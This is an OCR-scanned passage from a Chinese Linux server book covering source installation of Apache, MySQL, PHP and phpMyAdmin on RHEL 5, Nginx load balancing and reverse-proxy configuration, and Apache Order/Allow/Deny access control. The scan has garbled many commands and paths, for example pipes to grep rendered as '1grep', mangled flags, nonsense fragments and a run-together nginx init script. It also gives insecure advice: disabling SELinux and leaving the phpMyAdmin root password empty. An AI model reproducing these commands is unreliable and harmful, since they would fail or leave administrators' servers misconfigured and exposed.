不 打折 ， 可 以 达到 百 万 级 别 的 数据 存储 ， 网 站 初期 可 以 将 MySQL 和 Web 服务 器 放 在 一 起 ， 
但 是 当 访 问 量 达 到 一 定 规模 后 ， 应 该 将 MySQL 数据 库 从 Web Server 上 独立 出 来 ， 在 单独 的 
服务 器 上 运行 ， 同 时 保持 Web Server 和 MySQL 服务 器 的 稳定 连接 。 当 数据 库 访问 量 达到 更 
大 级 别 时 ， 可 以 考虑 使 用 MySQL Cluster 等 数据 库 集群 或 者 库 表 散 列 等 解决 方案 。 

总 的 来 说 ，LAMP 架构 的 网 站 性 能 会 远 远 优 于 Windows IIS 平台 ， 它 可 以 负载 的 访问 量 
也 非常 大 ， 因 此 采用 LAMP 架构 是 一 个 不 错 的 方案 。 综 上 所 述 ， 基 于 LAMP 架构 设计 具有 成 
本 低廉 、 部 署 灵活 、 安 全 稳定 等 特点 ， 是 Web 网 络 应 用 和 环境 的 优秀 组 合 。 


1.3 LAMP 安装 


由 于 LAMP 安装 比较 复杂 ， 为 保证 安装 顺利 进行 ， 需 要 对 以 下 几 个 问题 重点 说 明 。 


1.3.1 LAMP 安装 准备 


由 于 有 多 个 需要 安装 的 程序 ， 而 每 个 要 安装 的 服务 都 有 两 种 安装 方式 :源码 安装 、RPM 
包 安 装 。 一 般 情 况 下 ，LAMP 的 服务 安装 包 应 采用 同一 种 安装 方式 安装 ， 否 则 可 能 出 现 一 些 
不 兼容 的 安装 错误 。 出 于 安全 方面 的 考虑 ， 笔 者 建议 使 用 源码 安装 模式 ， 下 面 就 这 种 模式 在 
RHEL 5 版 本 下 的 安装 做 详细 说 明 。 


1. 准备 安装 包 
首先 需要 准备 好 下 列 安装 包 ， 为 避免 下 载 麻烦 ， 笔 者 将 所 有 安装 包 放 置 在 读者 互动 网 站 


(www.bjlcg.com) 上 : 


httpd-2.2.9.tar.gz 
mysql-5.0.41.tar.gz 
php-5.2.6.tar.gz 
phpMyAdmin-3.0.0-rcl-all-languages.tar.gz 
libxml2-2.6.30.tar.gz 
libmerypt-2.5.8.tar.gz 
zlib-1.2.3.tar.gz 
gd-2.0.35.tar.gz 
Autoconf-2.61.tar.gz 
freetype-2.3.5.tar.gz 
libpng-1.2.31.tar.gz 


Jpegsrc.v6b.tar.gz 
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@ ZendOptimizer330atargz (可 选 ) 


2. 修改 远程 登录 


编辑 文件 /etc/sysconfig/il8n。 

把 UTF-8 改 成 GB18030。 

关闭 Selinux。 

使 用 文本 编辑 工具 打开 /etc/selinux/config: 


#vi /etc/selinux/config 

把 SELINUX=enforcing 注释 掉 : #SELINUX=enforcing。 

然后 新 加 一 行为 : SELINUX=disabled。 

存盘 退出 ， 重 启 系统 。 

3. 检查 编译 工具 

在 安装 Linux 时 必须 把 GCC 编译 工具 装 上 ， 用 下 列 命令 检查 编译 工具 是 否 存在 : 
#gcc -Vv 

4. 卸载 默认 版 本 MySQL、Apache、PHP 


目前 发 行 的 Linux 操作 系统 版 本 中 ， 如 果 选 择 全 部 安装 ， 就 已 经 安装 了 LAMP 环境 ， 但 
是 版 本 相对 都 比较 低 。 为 了 在 安装 过 程 中 不 出 差错 ,以 及 今后 系统 能 够 稳定 运行 , 需要 在 安装 
之 前 , 先 检 查 系统 中 是 否 已 经 安装 了 低 版 本 的 环境 ， 如 果 已 经 安装 过 了 ,要 把 原来 的 环境 印 载 
掉 ， 若 保留 则 会 对 今后 安装 带 来 影响 ， 命 令 如 下 : 


#rpm -qa 1grep mysql 

查看 系统 中 是 否 已 经 安装 了 MySQL， 如 果 是 ， 则 务 载 所 有 以 mysql 开头 的 包 : 

# rpm -e mysql-5.0.45-7.e15 -nodeps 

利用 同样 的 方法 将 默认 安装 好 的 Apache、PHP 均 卸 载 ， 为 安装 新 的 tar 包 做 准备 。 
5. 安装 库 文件 


下 面 在 安装 PHP 之 前 ， 准 备 工作 要 做 足 ， 应 先 安装 PHP5 需要 的 最 新 版 本 库 文件 ， 例 
如 libxml2、libmerypt 以 及 GD2 库 等 文件 。 安装 GD2 库 是 为 了 让 PHP5 支持 GIF、PNG 和 
JPEG 图 片 格式 ,所 以 在 安装 GD2 库 之 前 ,还 要 先 安 装 最 新 的 zlib、libpng、freetype 和 jpegsrc 
等 库 文件 。 


(1) 安装 libxml2 库 文 件 


./configure --prefix=/usr/local/libxml2 
#make 


makeinstal 
(2) 安装 libmerypt 库 文件 


(3) 安装 zlib 库 文件 


(4) 安装 libpng 库 文件 


(5) 安装 jpeg6 库 文件 (安装 GD 的 必 备 软件 ) 


(6) 安装 freetype 库 文件 


(7) 安装 autoconf 库 文件 


(8) 安装 gd 库 文件 
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—-with-zlib=/usr/local/zlib/ \ 
—-with-jpeg=/usr/local/jpegé6/ \ 
—-with-png=/usr/local/libpng/ \ 


// 指 定 到 哪 去 找 zlib 库 文件 的 位 置 
// 指 定 到 哪 去 找 jpeg 库 文件 的 位 置 
// 指 定 到 哪 去 找 png 库 文件 的 位 置 


-with-freetype=/usr/local/freetype/ // 指 定 到 哪 去 找 freetype 2.x 字体 库 位 置 


#make && make install 


开始 安装 LAMP 


总 的 来 讲 ， 在 Linux 系统 中 源 代码 包 的 安装 过 程 基本 上 都 是 一 成 不 变 的 “三 大 定律 ”配置 
(Configure) 、 编 译 (Make) 、 安 装 (Make Install) 。 需 要 安装 的 所 有 软件 都 要 按照 一 定 的 
顺序 安装 ， 如 先 安装 Apache， 再 安装 MySQL， 最 后 安装 PHP。 但 安装 成 功 的 关键 在 于 安装 的 


次 序 和 一 些 软件 包 的 配置 ， 请 读者 按照 次 序 安装 。 
(1) 安装 Apache 服务 器 


当 安装 好 以 上 这 些 库 文件 后 ， 就 可 以 正式 安装 Apache 服务 器 了 : 


# 
> 
> 
和 
> 
> 
3 
区 
区 
间 


./configure \ 


--prefix=/usr/local/apache2 \ 
--sysconfdir=/etc/httpd \ 
--with-z=/usr/local/zlib/ \ 
--with-included-apr \ 
--enable-so \ 
--enable-deflate=shared \ 
--enable-expires=shared \ 
--enable-rewrite=shared \ 
--enable-static-support 

make && make install 


(2) 测试 Apache 服务 器 


检查 配置 文件 目录 : 


#/usr/local/apache2/bin/apachectl] start 
#/usr/local/apache2/bin/apachectl] stop 


并 


netstat -nalgrep 80 


// 执 行当 前 目录 下 软件 自 带 的 配置 命令 

// 指 定 apache 软件 安装 的 位 置 

// 指 定 Apache 服务 器 的 配置 文件 存放 位 置 
// 指 定 zlib 库 文件 的 位 置 

// 使 用 捆绑 APR/APR-Util 的 副本 

// 以 动态 共享 对 象 ( Dso) 编译 

// 缩 小 传输 编码 的 支持 

// 期 满 头 控制 

// 基 于 规则 的 URL 操控 

// 建 立 一 个 静态 链接 版 本 的 支持 


// 启 动 Apache 
// 关 闭 apache 
// 查 看 80 端口 是 否 开启 


在 浏览 器 中 输入 地 址 http://localhost/ 去 访问 Apache 服务 器 ， 验 证 一 下 。 
测试 成 功 之 后 需要 为 Apache 添加 自 启 动 功能 ， 编 辑 /etc/re.d/re.loca/， 输 入 如 下 命令 : 


echo "/usr/local/apache2/bin/apachectl start" >> /etc/rc.d/rc.local 


(3) 启动 Apache 


#/usr/local/apache2/bin/apachectl] start 


查看 http 进程 (注意 在 Debian 系统 为 apache2) : 
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#ps -All 1grep httpd 


注意 : 在 Debian 系统 中 可 以 使 用 ps -Alllgrep apache2 命令 , 另外 大 家 试 试 ps -eflegrep httpd 
看 看 结果 有 何不 同 ? 


(4) 设置 Apache 


打开 Apache 配置 文件 : /usr/local/apache2/conf/httpd.conf, 看 看 是 否 存在 这 行 : LoadModule 
phps_module modules/libphp5$.so。 

在 AddType application/x-compress .Z AddType application/x-gzip .gz .tgz 下 面 再 加 入 一 行 
AddType application/x-httpd-php .php .php4 .php5， 就 行 。.php .php4 .phps 的 意思 是 以 这 些 扩展 
名 结尾 的 文件 ， 在 Apache 中 用 php 解析 器 解析 。 

找到 DirectoryIndex 关键 字 : 添加 index.php。 


(5) 重启 Apache 服务 


[root@localhost php5]# /usr/local/apache2/bin/apachectl] stop 
[root@localhost php5]# /usr/local/apache2/bin/apachectl] start 


(6) 安装 MySQL 数据 库 


# groupadd mysql // 添 加 一 个 mysql 标准 组 

useradd -g mysql mysql // 添 加 mysql 用 户 并 加 到 mysql 组 中 
# ./configure --prefix=/usr/local/mysql/ \ 

> --with-extra-charsets=all \ 


> --sysconfdir=/etc 配置 文件 的 路 径 


当 出 现 “Thank you for choosing MySQL!”， 巷 喜 你 ， 安 装 成 功 了 。 


以 下 可 选 : 

--localstatedir=/usr/local/mysql/data // 数据 库存 放 的 路 径 

> --enable-assembler // 使 用 一 些 字符 函数 的 汇编 版 本 
> --with-mysqld-ldflags=-all-static // 以 纯 静态 方式 编译 服务 端 

> --with-charset=utf8 // 添加 utf8 字符 支持 

> --with-extra-charsets=all // 添加 所 有 字符 支持 


大 家 注意 最 后 加 了 一 行 “--with-plugins=all” 表 示 从 源 代码 编译 安装 MySQL, 默认 安装 时 ， 
是 没有 InnoDB 引擎 的 。 所 以 ， 在 输入 configure 命令 时 ， 需 要 加 入 “--with- plugins=all”， 这 
样 才 会 支持 InnoDB。 在 MySQL 里 可 以 执行 SHOW ENGINES 命令 来 查看 当前 的 MySQL 服 
务 器 所 支持 的 存储 引擎 。 


#make && make install 
(7) 配置 MySQL 数据 库 
创建 MySQL 数据 库 服务 器 的 配置 文件 ， 并 配置 MySQL 数据 库 : 
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# cp support-files/my-medium.cnf /etc/my.cnf 


bin/mysql install db --user=mysql // 初 始 化 数据 库 
# chown -R root . // 将 文件 的 所 有 属性 改 为 root 用 户 
# chown -R mysql var // 将 数据 目录 的 所 有 属性 改 为 mysql 用 户 
# chgrp -R mysql . // 将 组 属性 改 为 mysql 组 
# /usr/local/mysql/bin/mysqld safe --user=mysql & // 启 动 数据 库 
# netstat -nalgrep 3306 // 查 看 3306 端口 是 否 开启 
# bin/mysqladmin version // 简 单 的 测试 
# bin/mysqladmin variables // 查 看 所 有 mysql 参数 
# bin/mysql -u root // 没 有 密码 可 以 直接 登录 本 机 服务 器 


mysql> DELETE FROM mysql.user WHERE Host='1localhost' RND User=''; 
mysql> FLUSH PRIVILEGES; 
mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('alb2c3d4e5f6'); 


# bin/mysql -u root -h localhost -p // 按 Enter 键 进入 MysQL 客户 端 
# bin/mysqladmin -u root -p shutdown // 关 闭 MysQL 数据 库 

(8) 安装 PHP 模块 
# ./configure \ // 执 行当 前 目录 下 软件 自 带 的 配置 命令 
> --prefix=/usr/local/php \ // 设 置 PHP5 的 安装 路 径 
> --with-config-file-path=/usr/local/php/etc \ // 指 定 PHP5 配置 文件 存 入 的 路 径 
> --with-apxs2=/usr/local/apache2/bin/apxs \  // 指 定 PHP 查找 apache 2 的 位 置 
> --with-mysql=/usr/local/mysql/ \ // 指 定 Mysoz 的 安装 目录 
> --with-libxml-dir=/usr/local/libxm12/ \ // 指 定 PHP 放置 1ibxm12 库 的 位 置 
> --with-png-dir=/usr/local/libpng/ \ // 指 定 PHP 放置 1ibpng 库 的 位 置 
> --with-jpeg-dir=/usr/local/jpeg6/ \ // 指 定 PHP 放置 jpeg 库 的 位 置 
> --with-freetype-dir=/usr/local/freetype/ \ // 指 定 PHP 放置 freetype 库 的 位 置 
> --with-gd=/usr/local/gd2/ \ // 指 定 PHP 放置 gd 库 的 位 置 
> --with-zlib-dir=/usr/local/zlib/ \ // 指 定 PHP 放置 zlib 库 的 位 置 
> --with-mcrypt=/usr/local/libmcrypt/ \ // 指 定 PHP 放 置 1ibmcrypt 库 的 位 置 
> --with-mysqli=/usr/local/mysql/bin/mysql_config \// 变 量 激活 新 增加 MysQL 功能 
> --enable-soap \ // 变 量 激活 SOAP 和 Web services 支持 
> --enable-mbstring=all \ // 使 多 字 节 字符 串 支 持 
> --enable-sockets // 变 量 激活 socket 通信 特性 
#make && make install 

(9) 环境 整合 


# cp php.ini-dist /usr/local/php/etc/php.ini // 创 建 配置 文件 
vi /etc/httpd/httpd.conf // 使 用 vi 编辑 apache 配置 文件 
Addtype application/x-httpd-php .php .phtml # 添 加 这 一 条 


在 /usr/local/apache2/htdocs 下 建立 test.php 文件 : 
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# vi test.php // 编 辑 test .php 文件 
<?php 

phpinfo(); 
| 


然后 进行 测试 : 在 浏览 器 地 址 栏 输入 http:Wlocalhosttestphp， 若 出 现 与 PHP 相关 信息 的 
网 页 则 说 明 安 装 成 功 ， 否 则 需 进 一 步调 试 。 
(10) 安装 phpMyAdmin 
phpMyAdmin 下 载 地 址 为 http://www.phpmyadmin.net/， 目 前 最 新 版 本 为 4.0.7。 下 载 后 开 
始 安 装 : 


#cp -a phpMyAdmin-3.0.0-rcl-all-languages \ 
/usr/local/apache2/htdocs/phpmyadmin // 复 制 目录 到 指定 位 置 并 改名 为 pbhpmyadmin 
#cd /usr/local/apache2/htdocs/phpmyadmin/ 

#cp config.sample.inc.php config.inc.php 


phpMyAdmin 的 配置 有 以 下 模式 : 
@ http 身份 验证 模式 。 


@ cookie 身份 验证 模式 。 
@ config 身份 验证 模式 。 


# mv phpMyAdmin-3.0.0 /usr/local/apache/htdocs/ 

# vi config.inc.php 修改 这 个 文件 

$cfg['Servers'] [$i]['host'] = 'localhost'; // 改 成 数据 库 服务 器 的 主机 名 或 IP 地 址 
$cfg['Servers'] [$i]['user'] = 'root'; // MySQL 数据 库 的 用 户 名 
S$cfg['Servers'][$i] ['password'] =''; // MysQL 数据 库 的 密码 


主要 修改 这 几 项 ， 保 存 退出 。 在 浏览 器 地 址 栏 输入 以 下 地 址 行 测试 : 


http://IP/phpMyAdmin-3.0.0 


1.3.3 安装 PHP 扩展 Eaccelerator 0.9.6.1 加 速 软件 


Eaccelerator 是 一 款 PHP 的 加 速 软件 ， 其 前 身 是 truck-mmcache， 使 用 它 以 后 能 使 PHP 的 
执行 效率 有 很 大 幅度 的 提升 。 如 果 没 有 特殊 要 求 ， 为 了 避免 冲突 尽量 不 要 装 Zend。 最 新 
Eaccelerator 下 载 地 址 : http://eaccelerator.net/, 下 载 后 安装 步骤 如 下 : 

解压 : 


#tar jxvf eaccelerator-0.9.6.1.tar.bz2 -C /usr/local/src 


贺 进入 解压 目录 : 


ea /uar/local/sre/eaccelerator-0'96 
指定 PHP 所 在 路 径 : 


贺 这 时 会 将 Eaccelerator 安 装 到 PHP 目 录 中 ， 屏 幕 会 显示 Eaccelerator.so 所 在 路 径 ， 例 如 : 


回 修改 php.ini， 并 在 最 后 加 入 一 段 配置 信息 : 


四 建立 缓存 目录 : 


加 重启 Apache: 
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1.3.4 安装 Suhosin 


为 加 固 PHP 的 安全 性 , 需要 安装 Suhosin , 它 是 一 个 专门 的 安全 小 组 开发 的 专门 针对 PHP 
进行 安全 加 固 的 补丁 程序 : 


#cd /usr/local/src 

#wget -c http://download.suhosin.org/suhosin-0.9.32.1.tar.gz 
#tar -zxvf suhosin-0.9.32.1.tar.gz 

#cd suhosin-0.9.32.1 

#/usr/local/php/bin/phpize 

#./configure --with-php-config=/usr/local/php/bin/php-config 
#make && make install 


继续 修改 php.ini 文件 : 


vi /usr/local/php/php.ini 


查找 代码 : 

extension dir = "./" 

替换 为 : 

extension dir = "/usr/local/php/lib/php/extensions/no-debug-non-zts-— 
20060613/" 


extension="suhosin.so" 


1.4 利用 Nginx 实现 Web 负载 均衡 


对 于 提供 大 量 服务 请 求 的 网 站 来 说 ， 服 务 器 的 CPU、 磁 盘 IO 处 理 能 力 就 是 网 站 的 瓶颈 。 
如 果 简 单 升级 硬件 会 使 整个 网 站 运营 成 本 增加 , 当 连 接 请 求 继续 增加 时 ,简单 升级 硬件 就 无 法 
满足 要 求 ， 尤 其 是 面 对 DDoS 等 非 正常 访问 时 ， 这 时 必须 采用 多 台 服 务 器 同时 提供 网 络 服务 ， 
将 请 求 分 配给 这 些 服 务 器 ， 这 也 就 是 通常 讲 的 负载 均衡 (Load Balance) 。LB 可 以 由 硬件 实 
现 , 例如 F5 BIG-IP 等 4/7 层 负载 均衡 交换 机 ， 它 价格 不 菲 ， 不 是 今天 要 讨论 的 内 容 ， 在 这 里 
主要 给 大 家 介绍 利用 Nginx 来 实现 负载 均衡 。 
利用 Nginx 实现 负载 均衡 比较 简单 ， 可 配置 性 很 强 ， 可 以 按 URL 做 负载 均衡 ， 默 认 对 后 
端 有 健康 检查 的 能 力 。 后 端 机 器 少 的 情况 下 负载 均衡 能 力也 较 好 。 其 优点 主要 有 : 
@ 功能 强大 ， 支 持 高 并 发 连接 ， 内 存 消耗 少 。 在 实际 生产 环境 中 跑 到 2 -~ 3 万 并 发 连接 数 。 
@ 成 本 低廉 。Nginx 为 开源 软件 ， 可 以 免费 使 用 。 
@ Nginx 工作 在 网 络 的 第 7 层 ， 所 以 它 可 以 针对 HTTP 应 用 本 身 来 做 分 流 策略 ， 比 如 针 
对 域名 、 目 录 结 构 等 进行 分 流 ， 可 以 实现 多 种 分 配 策略 ， 如 可 以 实现 卫 Hash 等 分 配 
策略 。 
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1.4.1 安装、 配置 Nginx 


(1) 安装 所 需 组 件 
安装 Nignx 需要 zlib、zlib-dev、openssl、openssl-dev、pcre 和 pcre-devel， 前 面 4 个 可 以 
通过 yum -yinstall 的 方式 安装 ， 稍 微 负载 的 是 pcre， 下 面 介 绍 如 何 操作 。 


cd /usr/local/src 

wget 一 C 
ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.12.tar.gz 
Ea ZTE Bere D2 

cd pcre-8.12/ 

-./configure 

make && make install 

cd .. 

TW -TE Dre 

rm -rf /usr/bin/pcre-config 

cp -a /usr/local/bin/pcre-config /usr/bin/ 
rm -rf /usr/lib/libpcre.a 

cp -a /usr/local/lib/libpcre.a /usr/lib/ 


(2) 安装 Nginx 1.1 
Nginx 1.1 下 载 地 址 : http://nginx.org/download/nginx-1.1.11.tar.gz。 安 装 操 作 如 下 : 


cd /usr/local/src 

wget -c http://nginx.org/download/nginx-1.1.11.tar.gz 

tar zxvf nginx-1.1.1l1.tar.gz 

cad mine— ede 

./configure --user=wwW --group=Www --prefix=/usr/local/nginx 
--pid-path=/usr/local/nginx/logs/nginx.pid 


error-log-path=/usr/local/nginx/logs/error.1log 
--http-log-path=/usr/local/nginx/logs/access.log --with-http_stub status module 
--with-http_ssl module --http-client-body-temp-path=/tmp/nginx client 
--http-proxy-temp-path=/tmp/nginx proxy 

--http-fastcgi-temp-path=/tmp/nginx fastcgi --with-http gzip static module 
--with-google perftools module --with-ld-opt='-ltcmalloc minimal' --with-ipv6 
make && make install 
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(3) 编辑 nginx.conf 文件 


Vi /usr/local/nginx/conf/nginx.conf 


输入 以 下 内 容 : 


在 /usr/local/nginx/conf 目录 新 建 proxy.conf 文件 ， 并 输入 以 下 内 容 : 


(4) 建立 Nginx 虚拟 主机 目录 ， 把 nginx 加 入 到 系统 服务 


(5) 编辑 /etc/re.d/init.d/nginx 文件 ， 履 盖 为 以 下 代码 
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sleep 1 
do start 


echo 


/etc/init.d/httpd restart 


站 


echo "Usage: $SCRIPTNAME {start|stoplreload|lrestart}" >&2 


exit 3 


esac 


exit 0 


#! /bin/shulimit -n 65535#Description:Startup script for nginx#chkconfig:2345 55 25 

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binDESC="nginx 
daemon"NAME=nginxDAEMON=/usr/local/nginx/sbin/$NAMECONFIGFILE=/usr/local/nginx/co 
nf/nginx.confPIDFILE=/usr/local/nginx/10gs/$NAME .pidSCRIPTNAME=/etc/init.d/$NAME 


set -e[ -x "$DAEMON" ] || exit 0 

do start() { $DAEMON -c $CONFIGFILE || echo -n "nginx already running"} 
do stop() { kill -QUIT ‘cat $PIDFILE. || echo -n "nginx not running"} 
do reload() { kill -HUP ‘cat $PIDFILE” || echo -n "nginx can't reload"} 


case "$1" in start) echo -n "Starting S$DESC: $NAME" do start echo "." 
/etc/init.d/httpd start ;; stop) echo -n "Stopping $DESC: $NAME" do_stop echo "." 
/etc/init.d/httpd stop ;; reload) echo -n "Reloading $DESC configuration..." 
do_reload echo "." /etc/init.d/httpd restart ;; restart) echo -n "Restarting $DESC: 
$NAME" do_stop sleep 1 do start echo "." /etc/init.d/httpd restart ;; *) echo "Usage: 
$SCRIPTNAME {start|stoplreload|lrestart}" >&2 exit 3 ;;esac 

exit 0 


(6) 设置 为 自 启动 并 添加 启动 级 别 


#chmod a+x /etc/rc.d/init.d/nginx 
#chkconfig --add nginx 


#chkconfig nginx on 


接 下 来 ， 在 Nginx 虚拟 主机 目录 /usr/local/nginx/conf/vhost 中 建立 一 个 虚拟 主机 ， 并 创建 
文件 Default.conf， 输 入 以 下 代码 : 


#Vi default.conf 

server 

{ 

listen 80; 

server name website.com \\ 你 的 IP 或 域名 ; 
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# log format access 'S$http x forwarded for - S$remote user [$time local] 


"$request""' 


# '$status $body bytes sent "$http referer"' 
# '"$http user agent" $remote addr'; 


# access log logs/IP access.1log access; 


} 
以 上 全 部 保存 完毕 后 ， 启 动 Nginx: 
service nginx start 


(7) 优化 MySQL 
最 后 一 步 利 用 Tcmalloc 优化 MySQL 性 能 ， 打 开 mysqld 文件 : 


# vi /etc/init.d/mysqld 
添加 一 行 export LD_PRELOAD=/usr/local/lib/libtemalloc.so， 重 新 启动 MySQL: 


# lsof -nlgrep tcmalloc 


如 果 出 现下 面 列表 信息 即 表示 安装 成 功 : 


nginx 4322 www 10w REG 8,2 0 682436 /var/tmp/tcmalloc. 
nginx 4323 www 12w REG 8,2 0 682438 /var/tmp/tcmalloc. 
nginx 4324 www 14w REG 8,2 0 682439 /var/tmp/tcmalloc. 
nginx 4325 www 16w REG 012 0 682440 /var/tmp/tcmalloc. 
nginx 4326 www 18w REG 8,2 0 682441 /var/tmp/tcmalloc. 
nginx 4327 www 20w REG 8,2 0 682442 /var/tmp/tcmalloc. 
nginx 4328 www 22w REG 2 0 682443 /var/tmp/tcmalloc. 
nginx 4329 www 24w REG 2 0 682444 /var/tmp/tcmalloc. 


4322 
4323 
4324 
4325 
4326 
4327 
4328 
4329 


mysqld sa 5284 root mem REG 8,2 1388088 62997 /usr/local/lib/libtcmalloc.so.0.0.0 
mysqld 5397 mysql mem REG 8,2 1388088 62997 /usr/local/lib/libtcmalloc.so.0.0.0 


1.4.2 ”Nginx 实施 负载 均衡 


Nginx 的 负载 均衡 是 一 个 基于 内 容 和 应 用 的 7 层 交 换 负 载 均衡 ,是 以 反 向 代理 服务 器 方式 


实现 负载 均衡 。 因 此 使 用 Nginx 实现 服务 器 负载 均衡 的 关键 在 于 ngx_http_upstream hash_ 


module 模块 的 使 用 和 设置 Nginx 反 向 代理 配置 。 


在 nginx.conf 配置 文件 中 ， 用 Upstream 指令 定义 一 组 〈 以 4 台 服 务 器 为 例 ) 负载 均衡 后 


端 服务 器 池 : 


upstream SerVername { 


server 192.168.1.10:80 weight=1 max fails=3 


fail timeout=60s; 
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server 192.168.1.11:80 weight=1 max fails=3 
fail timeout=60s; 
server 192.168.1.12:80 weight=1 max fails=3 
fail timeout=60s; 
server 192.168.1.13:80 weight=1 max fails=3 
fail timeout=60s; 


} 


其 中 ，servername 是 服务 器 组 名 。weight: 设置 服务 器 的 权重 ,默认 值 是 1， 权 重 值 越 大 ， 
该 服务 器 被 访问 到 的 几率 就 越 大 。max_fails 和 fail timeout: 这 两 个 是 关联 的 ， 如 果 某 台 服 务 
器 在 fail timeout 时 间 内 出 现 了 max fails 次 连接 失败 , 那么 Nginx 就 会 认为 那个 服务 器 已 经 死 
机 ， 从 而 在 fail_ timeout 时 间 内 不 再 去 查询 它 。 


1.4.3 设置 Nginx 的 反 向 代理 配置 


反 向 代理 方式 与 普通 的 代理 方式 有 所 不 同 ， 标 准 代理 方式 是 客户 使 用 代理 访问 多 个 外 部 
Web 服务 器 ， 反 向 代理 方式 是 多 个 客户 使 用 它 访 问 内 部 Web 服务 器 ， 使 用 反 向 代理 服务 器 
可 以 将 请 求 转发 给 内 部 的 Web 服务 器 ， 从 而 提升 静态 网 页 的 访问 速度 。 因 此 可 以 使 用 这 种 技 
术 ， 让 代理 服务 器 将 请 求 均匀 转发 给 多 台 内 部 Web 服务 器 之 一 ， 从 而 达到 负载 均衡 的 目的 。 
使 用 反 向 代理 的 好 处 是 : 可 以 将 负载 均衡 和 代理 服务 器 的 高 速 缓存 技术 结合 在 一 起 , 提供 有 益 
的 性 能 ， 具 备 额 外 的 安全 性 ， 外 部 客户 不 能 直接 访问 真实 的 服务 器 ， 并且 可 以 实现 较 好 的 负载 
均衡 策略 , 将 负载 可 以 非常 均衡 地 分 给 内 部 服务 器 , 不 会 出 现 负载 集中 到 某 个 服务 器 的 偶然 现 
象 。 在 nginx.conf 配置 文件 中 ， 进 行 反 向 代理 配置 : 


servert{ 

listen 80; 

server name www.domain.com *.domain.com; 
location / 

{proxy_pass http://servername; 

proxy_set header Host $host; 

proxy_set header X-Forwarded-For S$remote addr; 
} 

access log off; 


} 


其 中 , proxy_pass http://servername: 用 于 指定 反 向 代理 的 服务 器 池 ; proxy_set_header Host 
$host 当 后 端 Web 服务 器 上 也 配置 有 多 个 虚拟 主机 时 , 需要 用 该 Header 来 区 分 反 向 代理 哪个 
主机 名 ; proxy_set_header X-Forwarded-For$remote_addr: 如 果 后 端 Web 服务 器 上 的 程序 需要 
获取 用 户 下， 就 从 该 Header 头 获取 。 
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1.4.4 在 Nginx 负载 均衡 服务 器 上 设置 缓存 


Nginx 从 0.7.48 版 本 开始 , 支持 了 类 似 Squid 的 缓存 功能 , 缓存 把 URL 及 相关 组 合 当 作 
Key， 用 md5 编码 哈 希 后 保存 。 对 于 修改 实时 性 要 求 不 高 的 图 片 、Flash、CSS 样式 文件 、 
JavaScript 文件 ， 可 以 在 Nginx 反 向 代理 (负载 均衡 ) 服务 器 上 设置 缓存 ,不 用 每 次 请 求 都 转 
发 到 后 端 Web 服务 器 ， 加 快 了 服务 器 响应 速度 。 同 时 也 可 以 减少 Nginx 与 后 端 Web 服务 器 
的 连接 数 ， 提 高 了 Nginx 处 理性 能 。 


1.5 ”Apache 安全 加 固 


Linux 安装 Web 服务 器 并 不 难 ， 但 是 其 维护 和 安全 加 固 并 非 易 事 ， 这 需要 深入 了 解 Linux 
系统 以 及 Apache 的 各 种 配置 选项 。 这 里 需 了 解 的 问题 是 如 何在 安全 性 、 可 操作 性 和 易 用 性 上 
找到 平衡 点 ， 但 这 也 取决 于 项 目的 具体 需求 ， 下 面 的 最 佳 实践 将 总 结 出 LAMP 项 目 中 所 有 服 
务 器 都 有 的 共同 特点 。 


1.5.1 使 用 配置 指令 进行 访问 控制 
利用 Apache 实现 访问 控制 的 配置 指令 包括 如 下 三 种 。 
1. Order 指令 


Order 指令 用 于 指定 执行 允许 访问 控制 规则 或 者 拒绝 访问 控制 规则 的 顺序 。 

Order 只 能 设置 为 “Order Allow,Deny” 或 “Order Deny,Allow”， 分 别 用 来 表明 用 户 先 
设置 允许 的 访问 地 址 还 是 先 设置 禁止 访问 的 地 址 。 

Order 选项 用 于 定义 默认 的 访问 权限 与 Allow 和 Deny 语句 的 处 理 顺序 。 而 Allow 和 Deny 
语句 可 以 针对 客户 机 的 域名 或 他 地 址 进行 设置 ， 以 决定 哪些 客户 机 能 够 访问 服务 器 。 

Order 语句 设置 的 两 种 值 的 具体 含义 如 下 。 


(1) Allow,Deny 
默认 禁止 所 有 客户 机 的 访问 ， 且 Allow 语句 在 Deny 语句 之 前 被 匹配 。 如 果 某 条 件 既 匹配 
Deny 语句 ， 又 匹配 Allow 语句 ， 则 Deny 语句 会 起 作用 (因为 Deny 语句 覆盖 了 Allow 语句 ) 。 


(2) Deny,Allow 
默认 允许 所 有 客户 机 的 访问 ， 且 Deny 语句 在 Allow 语句 之 前 被 匹配 。 如 果 某 条 件 既 匹配 
Deny 语句 又 匹配 Allow 语句 ， 则 Allow 语句 会 起 作用 (因为 Allow 语句 覆盖 了 Deny 语句 ) 。 


2. Allow 指令 


Allow 指令 指明 允许 访问 的 地 址 或 地 址 序列 。 例 如 ，Allow from all 指令 表明 允许 所 有 下 
来 的 访问 请 求 。 
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3. Deny 指令 


Deny 指令 指明 禁止 访问 的 地 址 或 地 址 序列 。 例 如 ，Deny from all 指令 表明 禁止 所 有 下 来 
的 访问 请 求 。 

下 面 举 几 个 简单 的 例子 ， 对 上 述 Order、Allow 和 Deny 命令 的 使 用 进行 示范 。 

在 本 例 中 ，website.com 域 中 所 有 主机 都 允许 访问 网 站 ， 而 其 他 非 该 域 中 的 任何 主机 访问 
都 被 拒绝 ， 因 为 Deny 在 前 访问 都 被 拒绝 ， 又 因为 Deny 在 前 ，Allow 在 后 ，Allow 语句 覆盖 了 
Deny 语句 。 

具体 命令 如 下 : 


Order Deny,Allow 
Deny from all 


Allow from website.com 


在 本 例 中 ，website.com 域 中 所 有 主机 ， 除 了 db.website.com 子 域 包含 的 主机 被 拒绝 访问 
以 外 ， 其 他 都 允许 访问 ， 所 有 不 在 website.com 域 中 的 主机 都 不 允许 访问 ， 因 为 默认 状态 是 拒 
绝对 服务 器 的 访问 〈Allow 在 前 ，Deny 在 后 ，Deny 语句 覆盖 了 Allow 语句 ) 。 

具体 命令 如 下 : 


Order Allow,Deny 
Allow from website.com 


Deny form do.website.com 


1.5.2 ”使 用 .htaccess 进行 访问 控制 


任何 出 现在 配置 文件 httpd.conf 中 的 指令 都 可 能 出 现在 .htaccess 文件 中 。.htaccess 文件 在 
httpd.conf 文件 的 Access FileName 指令 中 指定 , 用 于 进行 针对 单一 目录 的 配置 。 注意 : htaccess 
文件 也 只 能 设置 对 目录 的 访问 控制 。 

作为 系统 管理 员 ， 可 以 指定 .htaccess 文件 的 名 字 和 可 以 通过 该 文件 内 容 覆 盖 的 服务 器 配 
